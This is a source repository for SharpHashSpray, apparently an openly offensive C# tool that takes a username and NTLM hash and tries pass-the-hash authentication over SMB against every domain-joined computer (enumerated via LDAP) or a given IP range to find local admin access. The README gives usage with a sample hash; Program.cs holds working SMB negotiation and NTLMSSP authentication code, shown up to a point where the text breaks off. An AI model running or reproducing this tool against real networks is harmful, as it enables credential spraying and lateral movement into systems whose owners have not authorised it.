├── .gitignore
├── README.md
├── SharpInvoke-SMBExec.sln
└── SharpInvoke-SMBExec
├── App.config
├── IPRange.cs
├── Program.cs
├── Properties
└── AssemblyInfo.cs
├── SMBExec.cs
├── SharpHashSpray.csproj
└── Utilities.cs
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Aa][Rr][Mm]/
27 | [Aa][Rr][Mm]64/
28 | bld/
29 | [Bb]in/
30 | [Oo]bj/
31 | [Ll]og/
32 | [Ll]ogs/
33 |
34 | # Visual Studio 2015/2017 cache/options directory
35 | .vs/
36 | # Uncomment if you have tasks that create the project's static files in wwwroot
37 | #wwwroot/
38 |
39 | # Visual Studio 2017 auto generated files
40 | Generated\ Files/
41 |
42 | # MSTest test Results
43 | [Tt]est[Rr]esult*/
44 | [Bb]uild[Ll]og.*
45 |
46 | # NUnit
47 | *.VisualState.xml
48 | TestResult.xml
49 | nunit-*.xml
50 |
51 | # Build Results of an ATL Project
52 | [Dd]ebugPS/
53 | [Rr]eleasePS/
54 | dlldata.c
55 |
56 | # Benchmark Results
57 | BenchmarkDotNet.Artifacts/
58 |
59 | # .NET Core
60 | project.lock.json
61 | project.fragment.lock.json
62 | artifacts/
63 |
64 | # StyleCop
65 | StyleCopReport.xml
66 |
67 | # Files built by Visual Studio
68 | *_i.c
69 | *_p.c
70 | *_h.h
71 | *.ilk
72 | *.meta
73 | *.obj
74 | *.iobj
75 | *.pch
76 | *.pdb
77 | *.ipdb
78 | *.pgc
79 | *.pgd
80 | *.rsp
81 | *.sbr
82 | *.tlb
83 | *.tli
84 | *.tlh
85 | *.tmp
86 | *.tmp_proj
87 | *_wpftmp.csproj
88 | *.log
89 | *.vspscc
90 | *.vssscc
91 | .builds
92 | *.pidb
93 | *.svclog
94 | *.scc
95 |
96 | # Chutzpah Test files
97 | _Chutzpah*
98 |
99 | # Visual C++ cache files
100 | ipch/
101 | *.aps
102 | *.ncb
103 | *.opendb
104 | *.opensdf
105 | *.sdf
106 | *.cachefile
107 | *.VC.db
108 | *.VC.VC.opendb
109 |
110 | # Visual Studio profiler
111 | *.psess
112 | *.vsp
113 | *.vspx
114 | *.sap
115 |
116 | # Visual Studio Trace Files
117 | *.e2e
118 |
119 | # TFS 2012 Local Workspace
120 | $tf/
121 |
122 | # Guidance Automation Toolkit
123 | *.gpState
124 |
125 | # ReSharper is a .NET coding add-in
126 | _ReSharper*/
127 | *.[Rr]e[Ss]harper
128 | *.DotSettings.user
129 |
130 | # TeamCity is a build add-in
131 | _TeamCity*
132 |
133 | # DotCover is a Code Coverage Tool
134 | *.dotCover
135 |
136 | # AxoCover is a Code Coverage Tool
137 | .axoCover/*
138 | !.axoCover/settings.json
139 |
140 | # Visual Studio code coverage results
141 | *.coverage
142 | *.coveragexml
143 |
144 | # NCrunch
145 | _NCrunch_*
146 | .*crunch*.local.xml
147 | nCrunchTemp_*
148 |
149 | # MightyMoose
150 | *.mm.*
151 | AutoTest.Net/
152 |
153 | # Web workbench (sass)
154 | .sass-cache/
155 |
156 | # Installshield output folder
157 | [Ee]xpress/
158 |
159 | # DocProject is a documentation generator add-in
160 | DocProject/buildhelp/
161 | DocProject/Help/*.HxT
162 | DocProject/Help/*.HxC
163 | DocProject/Help/*.hhc
164 | DocProject/Help/*.hhk
165 | DocProject/Help/*.hhp
166 | DocProject/Help/Html2
167 | DocProject/Help/html
168 |
169 | # Click-Once directory
170 | publish/
171 |
172 | # Publish Web Output
173 | *.[Pp]ublish.xml
174 | *.azurePubxml
175 | # Note: Comment the next line if you want to checkin your web deploy settings,
176 | # but database connection strings (with potential passwords) will be unencrypted
177 | *.pubxml
178 | *.publishproj
179 |
180 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
181 | # checkin your Azure Web App publish settings, but sensitive information contained
182 | # in these scripts will be unencrypted
183 | PublishScripts/
184 |
185 | # NuGet Packages
186 | *.nupkg
187 | # NuGet Symbol Packages
188 | *.snupkg
189 | # The packages folder can be ignored because of Package Restore
190 | **/[Pp]ackages/*
191 | # except build/, which is used as an MSBuild target.
192 | !**/[Pp]ackages/build/
193 | # Uncomment if necessary however generally it will be regenerated when needed
194 | #!**/[Pp]ackages/repositories.config
195 | # NuGet v3's project.json files produces more ignorable files
196 | *.nuget.props
197 | *.nuget.targets
198 |
199 | # Microsoft Azure Build Output
200 | csx/
201 | *.build.csdef
202 |
203 | # Microsoft Azure Emulator
204 | ecf/
205 | rcf/
206 |
207 | # Windows Store app package directories and files
208 | AppPackages/
209 | BundleArtifacts/
210 | Package.StoreAssociation.xml
211 | _pkginfo.txt
212 | *.appx
213 | *.appxbundle
214 | *.appxupload
215 |
216 | # Visual Studio cache files
217 | # files ending in .cache can be ignored
218 | *.[Cc]ache
219 | # but keep track of directories ending in .cache
220 | !?*.[Cc]ache/
221 |
222 | # Others
223 | ClientBin/
224 | ~$*
225 | *~
226 | *.dbmdl
227 | *.dbproj.schemaview
228 | *.jfm
229 | *.pfx
230 | *.publishsettings
231 | orleans.codegen.cs
232 |
233 | # Including strong name files can present a security risk
234 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
235 | #*.snk
236 |
237 | # Since there are multiple workflows, uncomment next line to ignore bower_components
238 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
239 | #bower_components/
240 |
241 | # RIA/Silverlight projects
242 | Generated_Code/
243 |
244 | # Backup & report files from converting an old project file
245 | # to a newer Visual Studio version. Backup files are not needed,
246 | # because we have git ;-)
247 | _UpgradeReport_Files/
248 | Backup*/
249 | UpgradeLog*.XML
250 | UpgradeLog*.htm
251 | ServiceFabricBackup/
252 | *.rptproj.bak
253 |
254 | # SQL Server files
255 | *.mdf
256 | *.ldf
257 | *.ndf
258 |
259 | # Business Intelligence projects
260 | *.rdl.data
261 | *.bim.layout
262 | *.bim_*.settings
263 | *.rptproj.rsuser
264 | *- [Bb]ackup.rdl
265 | *- [Bb]ackup ([0-9]).rdl
266 | *- [Bb]ackup ([0-9][0-9]).rdl
267 |
268 | # Microsoft Fakes
269 | FakesAssemblies/
270 |
271 | # GhostDoc plugin setting file
272 | *.GhostDoc.xml
273 |
274 | # Node.js Tools for Visual Studio
275 | .ntvs_analysis.dat
276 | node_modules/
277 |
278 | # Visual Studio 6 build log
279 | *.plg
280 |
281 | # Visual Studio 6 workspace options file
282 | *.opt
283 |
284 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
285 | *.vbw
286 |
287 | # Visual Studio LightSwitch build output
288 | **/*.HTMLClient/GeneratedArtifacts
289 | **/*.DesktopClient/GeneratedArtifacts
290 | **/*.DesktopClient/ModelManifest.xml
291 | **/*.Server/GeneratedArtifacts
292 | **/*.Server/ModelManifest.xml
293 | _Pvt_Extensions
294 |
295 | # Paket dependency manager
296 | .paket/paket.exe
297 | paket-files/
298 |
299 | # FAKE - F# Make
300 | .fake/
301 |
302 | # CodeRush personal settings
303 | .cr/personal
304 |
305 | # Python Tools for Visual Studio (PTVS)
306 | __pycache__/
307 | *.pyc
308 |
309 | # Cake - Uncomment if you are using it
310 | # tools/**
311 | # !tools/packages.config
312 |
313 | # Tabs Studio
314 | *.tss
315 |
316 | # Telerik's JustMock configuration file
317 | *.jmconfig
318 |
319 | # BizTalk build output
320 | *.btp.cs
321 | *.btm.cs
322 | *.odx.cs
323 | *.xsd.cs
324 |
325 | # OpenCover UI analysis results
326 | OpenCover/
327 |
328 | # Azure Stream Analytics local run output
329 | ASALocalRun/
330 |
331 | # MSBuild Binary and Structured Log
332 | *.binlog
333 |
334 | # NVidia Nsight GPU debugger configuration file
335 | *.nvuser
336 |
337 | # MFractors (Xamarin productivity tool) working folder
338 | .mfractor/
339 |
340 | # Local History for Visual Studio
341 | .localhistory/
342 |
343 | # BeatPulse healthcheck temp database
344 | healthchecksdb
345 |
346 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
347 | MigrationBackup/
348 |
349 | # Ionide (cross platform F# VS Code tools) working folder
350 | .ionide/
351 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # SharpHashSpray
2 | Check for local admin access using the provided username and NTLM hash.
3 |
4 | By default SharpHashSpray will automatically fetch a list of all domain joined hosts to check. The tool must be executed within the context of a domain user for this to work.
5 |
6 | Alternatively a target range can be provided in CIDR notation (e.g. 192.168.100.0/24) or in the format 192.168.0-255.0-255.
7 |
8 | SharpHashSpray does not require admin or any special privileges.
9 |
10 | # Example Usage
11 | ```
12 | SharpHashSpray.exe Administrator 64F12CDDAA88057E06A81B54E73B949B
13 | SharpHashSpray.exe Administrator 64F12CDDAA88057E06A81B54E73B949B 192.168.1.0/24
14 | ```
15 |
16 | # Thanks
17 | 99% of the code is from https://github.com/checkymander/Sharp-SMBExec which in turn is from https://github.com/Kevin-Robertson/Invoke-TheHash. Go thank these people.
18 |
--------------------------------------------------------------------------------
/SharpInvoke-SMBExec.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31129.286
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpHashSpray", "SharpInvoke-SMBExec\SharpHashSpray.csproj", "{344EE55A-4E32-46F2-A003-69AD52B55945}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {344EE55A-4E32-46F2-A003-69AD52B55945}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {344EE55A-4E32-46F2-A003-69AD52B55945}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {344EE55A-4E32-46F2-A003-69AD52B55945}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {344EE55A-4E32-46F2-A003-69AD52B55945}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {D9BD24B8-16BA-4BD0-9B1B-EDA14943B1FF}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/SharpInvoke-SMBExec/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/SharpInvoke-SMBExec/IPRange.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Net;
6 | using System.Text.RegularExpressions;
7 |
8 | namespace SharpInvoke_SMBExec
9 | {
10 | // from https://stackoverflow.com/questions/4172677/c-enumerate-ip-addresses-in-a-range
11 | internal class IPRange
12 | {
13 | public IPRange(string ipRange)
14 | {
15 | if (ipRange == null)
16 | throw new ArgumentNullException();
17 |
18 | if (!TryParseCIDRNotation(ipRange) && !TryParseSimpleRange(ipRange))
19 | throw new ArgumentException();
20 | }
21 |
22 | public IEnumerable GetAllIP()
23 | {
24 | int capacity = 1;
25 | for (int i = 0; i < 4; i++)
26 | capacity *= endIP[i] - beginIP[i] + 1;
27 |
28 | List ips = new List(capacity);
29 | for (int i0 = beginIP[0]; i0 <= endIP[0]; i0++)
30 | {
31 | for (int i1 = beginIP[1]; i1 <= endIP[1]; i1++)
32 | {
33 | for (int i2 = beginIP[2]; i2 <= endIP[2]; i2++)
34 | {
35 | for (int i3 = beginIP[3]; i3 <= endIP[3]; i3++)
36 | {
37 | ips.Add(new IPAddress(new byte[] { (byte)i0, (byte)i1, (byte)i2, (byte)i3 }));
38 | }
39 | }
40 | }
41 | }
42 |
43 | return ips;
44 | }
45 |
46 | ///
47 | /// Parse IP-range string in CIDR notation.
48 | /// For example "12.15.0.0/16".
49 | ///
50 | ///
51 | ///
52 | private bool TryParseCIDRNotation(string ipRange)
53 | {
54 | string[] x = ipRange.Split('/');
55 |
56 | if (x.Length != 2)
57 | return false;
58 |
59 | byte bits = byte.Parse(x[1]);
60 | uint ip = 0;
61 | String[] ipParts0 = x[0].Split('.');
62 |
63 | // if the user entered an incorrect CIRD range e.g. 172.18.100.50/24 which should be 172.18.100.0/24, fix it
64 | if (uint.Parse(ipParts0[3]) > 0 && bits != 32)
65 | {
66 | ipParts0[3] = "0";
67 | }
68 |
69 | for (int i = 0; i < 4; i++)
70 | {
71 | ip = ip << 8;
72 | ip += uint.Parse(ipParts0[i]);
73 | }
74 |
75 | byte shiftBits = (byte)(32 - bits);
76 | uint ip1 = (ip >> shiftBits) << shiftBits;
77 |
78 | if (ip1 != ip) // Check correct subnet address
79 | return false;
80 |
81 | uint ip2 = ip1 >> shiftBits;
82 | for (int k = 0; k < shiftBits; k++)
83 | {
84 | ip2 = (ip2 << 1) + 1;
85 | }
86 |
87 | beginIP = new byte[4];
88 | endIP = new byte[4];
89 |
90 | for (int i = 0; i < 4; i++)
91 | {
92 | beginIP[i] = (byte)((ip1 >> (3 - i) * 8) & 255);
93 | endIP[i] = (byte)((ip2 >> (3 - i) * 8) & 255);
94 | }
95 |
96 | return true;
97 | }
98 |
99 |
100 | ///
101 | /// Parse IP-range string "12.15-16.1-30.10-255"
102 | ///
103 | ///
104 | ///
105 | private bool TryParseSimpleRange(string ipRange)
106 | {
107 | String[] ipParts = ipRange.Split('.');
108 |
109 | beginIP = new byte[4];
110 | endIP = new byte[4];
111 | for (int i = 0; i < 4; i++)
112 | {
113 | string[] rangeParts = ipParts[i].Split('-');
114 |
115 | if (rangeParts.Length < 1 || rangeParts.Length > 2)
116 | return false;
117 |
118 | beginIP[i] = byte.Parse(rangeParts[0]);
119 | endIP[i] = (rangeParts.Length == 1) ? beginIP[i] : byte.Parse(rangeParts[1]);
120 | }
121 |
122 | return true;
123 | }
124 |
125 | private byte[] beginIP;
126 | private byte[] endIP;
127 | }
128 | }
129 |
--------------------------------------------------------------------------------
/SharpInvoke-SMBExec/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Threading;
3 | using System.Security.Cryptography;
4 | using System.Diagnostics;
5 | using System.Net.Sockets;
6 | using System.Collections.Specialized;
7 | using System.Collections.Generic;
8 | using System.Linq;
9 | using System.Text;
10 | using System.DirectoryServices;
11 | using System.Security.Principal;
12 | using System.DirectoryServices.ActiveDirectory;
13 | using System.Threading.Tasks;
14 |
15 | namespace SharpInvoke_SMBExec
16 | {
17 | class Program
18 | {
19 | static void Main(string[] args)
20 | {
21 | if (args.Length < 2)
22 | {
23 | Console.WriteLine("SharpHashSpray.exe Username NTLM");
24 | Console.WriteLine("SharpHashSpray.exe Username NTLM Targets");
25 | Console.WriteLine("Default is to automatically fetch a list of all domain joined hosts.");
26 | Console.WriteLine("Targets can be in the format 192.168.0.0/24, 192.168.0.0/255.255.255.0, 192.168.0.0-192.168.0.255");
27 | return;
28 | }
29 |
30 | string username = args[0];
31 | string hash = args[1];
32 | List targets;
33 |
34 | if (args.Length == 3)
35 | {
36 | targets = new IPRange(args[2]).GetAllIP().Select(ip => ip.ToString()).ToList();
37 | }
38 | else
39 | {
40 | targets = GetComputers();
41 | }
42 |
43 | Parallel.ForEach(targets, new ParallelOptions { MaxDegreeOfParallelism = 4 }, t =>
44 | {
45 | try
46 | {
47 | //Console.WriteLine(t);
48 | run(t, username, hash);
49 | }
50 | catch (Exception e)
51 | {
52 | Console.WriteLine(e.ToString());
53 | }
54 | });
55 | }
56 | public static List GetDomainControllers()
57 | {
58 | List domainControllers = new List();
59 | try
60 | {
61 | Domain domain = Domain.GetCurrentDomain();
62 | foreach (DomainController dc in domain.DomainControllers)
63 | {
64 | domainControllers.Add(dc);
65 | }
66 | }
67 | catch { }
68 | return domainControllers;
69 | }
70 |
71 | public static List GetComputers()
72 | {
73 | List computerNames = new List();
74 | List dcs = GetDomainControllers();
75 | if (dcs.Count > 0)
76 | {
77 | try
78 | {
79 | Domain domain = Domain.GetCurrentDomain();
80 | //domain.
81 | string currentUser = WindowsIdentity.GetCurrent().Name.Split('\\')[1];
82 |
83 |
84 | using (DirectoryEntry entry = new DirectoryEntry(String.Format("LDAP://{0}", dcs[0])))
85 | {
86 | using (DirectorySearcher mySearcher = new DirectorySearcher(entry))
87 | {
88 | mySearcher.Filter = ("(objectClass=computer)");
89 |
90 | // No size limit, reads all objects
91 | mySearcher.SizeLimit = 0;
92 |
93 | // Read data in pages of 250 objects. Make sure this value is below the limit configured in your AD domain (if there is a limit)
94 | mySearcher.PageSize = 250;
95 |
96 | // Let searcher know which properties are going to be used, and only load those
97 | mySearcher.PropertiesToLoad.Add("name");
98 |
99 | foreach (SearchResult resEnt in mySearcher.FindAll())
100 | {
101 | // Note: Properties can contain multiple values.
102 | if (resEnt.Properties["name"].Count > 0)
103 | {
104 | string computerName = (string)resEnt.Properties["name"][0];
105 | computerNames.Add(computerName);
106 | }
107 | }
108 | }
109 | }
110 | }
111 | catch { }
112 | }
113 | else
114 | {
115 | Console.WriteLine("ERROR: Could not get a list of Domain Controllers.");
116 | }
117 | return computerNames;
118 | }
119 |
120 | static void run(string Target, string username, string hash)
121 | {
122 | //User Set
123 | //string Target = args[0];
124 | //string username = args[1];
125 | string domain = "";
126 | string command = "";
127 | //string hash = args[2];
128 | string ServiceName = "";
129 | bool ForceSMB1 = false;
130 | bool ComSpec = false;
131 | int sleep = 15;
132 | bool debug = false;
133 | bool AdminCheck = true;
134 |
135 | //Trackers
136 | bool Login_Successful = false;
137 | bool Service_Deleted = false;
138 | bool SMBExec_Failed = false;
139 | bool SMB_execute = false;
140 | bool SMB_Signing = false;
141 | string Output_Username;
142 | string processID = BitConverter.ToString(BitConverter.GetBytes(Process.GetCurrentProcess().Id)).Replace("-", "");
143 | string[] processID2 = processID.Split('-');
144 | StringBuilder output = new StringBuilder();
145 | int SMB2_Message_ID = 0;
146 | int SMB_Close_Service_Handle_Stage = 0;
147 | int SMB_Split_Stage = 0;
148 | int SMB_Split_Index_Tracker = 0;
149 | double SMB_Split_Stage_final = 0;
150 | //Communication
151 | byte[] SMBClientReceive = null;
152 | //Packet Reqs
153 | byte[] Process_ID_Bytes = Utilities.ConvertStringToByteArray(processID.ToString());
154 | byte[] SMB_Session_ID = null;
155 | byte[] Session_Key = null;
156 | byte[] SMB_Session_Key_Length = null;
157 | byte[] SMB_Negotiate_Flags = null;
158 | byte[] SMB2_Tree_ID = null;
159 | byte[] SMB_Client_Send = null;
160 | byte[] SMB_FID = new byte[2];
161 | byte[] SMB_Service_Manager_Context_Handle = null;
162 | byte[] SMB_Service_Context_Handle = null;
163 | byte[] SMB_Named_Pipe_Bytes = null;
164 | byte[] SMB_File_ID = null;
165 | byte[] SMB_User_ID = null;
166 | byte[] SMB_Header = null;
167 | byte[] SMB2_Header = null;
168 | byte[] SMB_Data = null;
169 | byte[] SMB2_Data = null;
170 | byte[] NetBIOS_Session_Service = null;
171 | byte[] NTLMSSP_Negotiate = null;
172 | byte[] NTLMSSP_Auth = null;
173 | byte[] SMB_Sign = null;
174 | byte[] SMB_Signature = null;
175 | byte[] SMB_Signature2 = null;
176 | byte[] SMB2_Sign = null;
177 | byte[] SMB2_Signature = null;
178 | byte[] SMB_Signing_Sequence = null;
179 | byte[] RPC_Data = null;
180 | byte[] SCM_Data = null;
181 | OrderedDictionary Packet_SMB_Header = null;
182 | OrderedDictionary Packet_SMB2_Header = null;
183 | OrderedDictionary Packet_SMB_Data = null;
184 | OrderedDictionary Packet_SMB2_Data = null;
185 | OrderedDictionary Packet_NTLMSSP_Negotiate = null;
186 | OrderedDictionary Packet_NTLMSSP_Auth = null;
187 | OrderedDictionary Packet_RPC_Data = null;
188 | OrderedDictionary Packet_SCM_Data = null;
189 | MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
190 |
191 | if (String.IsNullOrEmpty(username) || String.IsNullOrEmpty(hash) || String.IsNullOrEmpty(Target))
192 | {
193 | displayHelp("Missing Required Params");
194 | }
195 | else
196 | {
197 | if (hash.Contains(":"))
198 | hash = hash.Split(':').Last();
199 | }
200 | if (!string.IsNullOrEmpty(domain))
201 | Output_Username = domain + '\\' + username;
202 | else
203 | Output_Username = username;
204 |
205 |
206 | if (!AdminCheck)
207 | {
208 | if (debug) { output.Append("AdminCheck is false"); }
209 | if (!string.IsNullOrEmpty(command))
210 | {
211 | if (debug) { output.Append("String is not empty"); }
212 | SMB_execute = true;
213 | }
214 | }
215 |
216 | TcpClient SMBClient = new TcpClient();
217 | SMBClient.Client.ReceiveTimeout = 60000;
218 |
219 | try
220 | {
221 | SMBClient.Connect(Target, 445);
222 | }
223 | catch
224 | {
225 | output.Append(String.Format("Could not connect to {0}", Target));
226 | }
227 |
228 | if (SMBClient.Connected)
229 | {
230 | if (debug) { output.Append(String.Format("Connected to {0}", Target)); }
231 | NetworkStream SMBClientStream = SMBClient.GetStream();
232 | SMBClientReceive = new byte[1024];
233 | string SMBClientStage = "NegotiateSMB";
234 |
235 | while (SMBClientStage != "exit")
236 | {
237 | if (debug) { output.Append(String.Format("Current Stage: {0}", SMBClientStage)); }
238 | switch (SMBClientStage)
239 | {
240 | case "NegotiateSMB":
241 | {
242 | Packet_SMB_Header = new OrderedDictionary();
243 | Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x72 }, new byte[] { 0x18 }, new byte[] { 0x01, 0x48 }, new byte[] { 0xff, 0xff }, Process_ID_Bytes, new byte[] { 0x00, 0x00 });
244 | Packet_SMB_Data = SMBExec.SMBNegotiateProtocolRequest(ForceSMB1);
245 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
246 | SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
247 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
248 |
249 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
250 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
251 | if (BitConverter.ToString(new byte[] { SMBClientReceive[4], SMBClientReceive[5], SMBClientReceive[6], SMBClientReceive[7] }).ToLower() == "ff-53-4d-42")
252 | {
253 | ForceSMB1 = true;
254 | if (debug) { output.Append("Using SMB1"); }
255 | SMBClientStage = "NTLMSSPNegotiate";
256 | if (BitConverter.ToString(new byte[] { SMBClientReceive[39] }).ToLower() == "0f")
257 | {
258 | if (debug) { output.Append("SMB Signing is Enabled"); }
259 | SMB_Signing = true;
260 | SMB_Session_Key_Length = new byte[] { 0x00, 0x00 };
261 | SMB_Negotiate_Flags = new byte[] { 0x15, 0x82, 0x08, 0xa0 };
262 |
263 | }
264 | else
265 | {
266 | if (debug) { output.Append("SMB Signing is not Enforced"); }
267 | SMB_Signing = false;
268 | SMB_Session_Key_Length = new byte[] { 0x00, 0x00 };
269 | SMB_Negotiate_Flags = new byte[] { 0x05, 0x82, 0x08, 0xa0 };
270 |
271 | }
272 | }
273 | else
274 | {
275 | if (debug) { output.Append("Using SMB2"); }
276 | SMBClientStage = "NegotiateSMB2";
277 | if (BitConverter.ToString(new byte[] { SMBClientReceive[70] }) == "03")
278 | {
279 | if (debug) { output.Append("SMB Signing is Enabled"); }
280 | SMB_Signing = true;
281 | SMB_Session_Key_Length = new byte[] { 0x00, 0x00 };
282 | SMB_Negotiate_Flags = new byte[] { 0x15, 0x82, 0x08, 0xa0 };
283 | }
284 | else
285 | {
286 | if (debug) { output.Append("SMB Signing is not Enforced"); }
287 | SMB_Signing = false;
288 | SMB_Session_Key_Length = new byte[] { 0x00, 0x00 };
289 | SMB_Negotiate_Flags = new byte[] { 0x05, 0x80, 0x08, 0xa0 };
290 | }
291 | }
292 | }
293 | break;
294 | case "NegotiateSMB2":
295 | {
296 | SMB2_Message_ID = 1;
297 | Packet_SMB2_Header = new OrderedDictionary();
298 | SMB2_Tree_ID = new byte[] { 0x00, 0x00, 0x00, 0x00 };
299 | SMB_Session_ID = new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
300 | Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x00, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
301 | Packet_SMB2_Data = SMBExec.SMB2NegotiateProtocolRequest();
302 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
303 | SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
304 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
305 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
306 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
307 | SMBClientStage = "NTLMSSPNegotiate";
308 |
309 | }
310 | break;
311 | case "NTLMSSPNegotiate":
312 | {
313 | SMB_Client_Send = null;
314 | if (ForceSMB1)
315 | {
316 | Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x73 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, new byte[] { 0xff, 0xff }, Process_ID_Bytes, new byte[] { 0x00, 0x00 });
317 |
318 | if (SMB_Signing)
319 | {
320 | Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
321 | }
322 | Packet_NTLMSSP_Negotiate = SMBExec.NTLMSSPNegotiate(SMB_Negotiate_Flags, null);
323 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
324 | NTLMSSP_Negotiate = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Negotiate);
325 | Packet_SMB_Data = SMBExec.SMBSessionSetupAndXRequest(NTLMSSP_Negotiate);
326 | SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
327 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
328 |
329 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
330 | }
331 | else
332 | {
333 | Packet_SMB2_Header = new OrderedDictionary();
334 | SMB2_Message_ID += 1;
335 | Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x01, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
336 | Packet_NTLMSSP_Negotiate = SMBExec.NTLMSSPNegotiate(SMB_Negotiate_Flags, null);
337 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
338 | NTLMSSP_Negotiate = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Negotiate);
339 | Packet_SMB2_Data = SMBExec.SMB2SessionSetupRequest(NTLMSSP_Negotiate);
340 | SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
341 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
342 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
343 | }
344 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
345 | SMBClientStage = "exit";
346 | }
347 | break;
348 |
349 | }
350 | }
351 | if (debug) { output.Append(String.Format("Authenticating to {0}", Target)); }
352 | string SMB_NTLSSP = BitConverter.ToString(SMBClientReceive);
353 | SMB_NTLSSP = SMB_NTLSSP.Replace("-", "");
354 | int SMB_NTLMSSP_Index = SMB_NTLSSP.IndexOf("4E544C4D53535000");
355 | int SMB_NTLMSSP_Bytes_Index = SMB_NTLMSSP_Index / 2;
356 | int SMB_Domain_Length = Utilities.DataLength(SMB_NTLMSSP_Bytes_Index + 12, SMBClientReceive);
357 | int SMB_Target_Length = Utilities.DataLength(SMB_NTLMSSP_Bytes_Index + 40, SMBClientReceive);
358 | SMB_Session_ID = Utilities.GetByteRange(SMBClientReceive, 44, 51);
359 | byte[] SMB_NTLM_challenge = Utilities.GetByteRange(SMBClientReceive, SMB_NTLMSSP_Bytes_Index + 24, SMB_NTLMSSP_Bytes_Index + 31);
360 | byte[] SMB_Target_Details = null;
361 | SMB_Target_Details = Utilities.GetByteRange(SMBClientReceive, (SMB_NTLMSSP_Bytes_Index + 56 + SMB_Domain_Length), (SMB_NTLMSSP_Bytes_Index + 55 + SMB_Domain_Length + SMB_Target_Length));
362 | byte[] SMB_Target_Time_Bytes = Utilities.GetByteRange(SMB_Target_Details, SMB_Target_Details.Length - 12, SMB_Target_Details.Length - 5);
363 | string hash2 = "";
364 | for (int i = 0; i < hash.Length - 1; i += 2) { hash2 += (hash.Substring(i, 2) + "-"); };
365 | byte[] NTLM_hash_bytes = (Utilities.ConvertStringToByteArray(hash.Replace("-", "")));
366 | string Auth_Hostname = Environment.MachineName;
367 | byte[] Auth_Hostname_Bytes = Encoding.Unicode.GetBytes(Auth_Hostname);
368 | byte[] Auth_Domain_Bytes = Encoding.Unicode.GetBytes(domain);
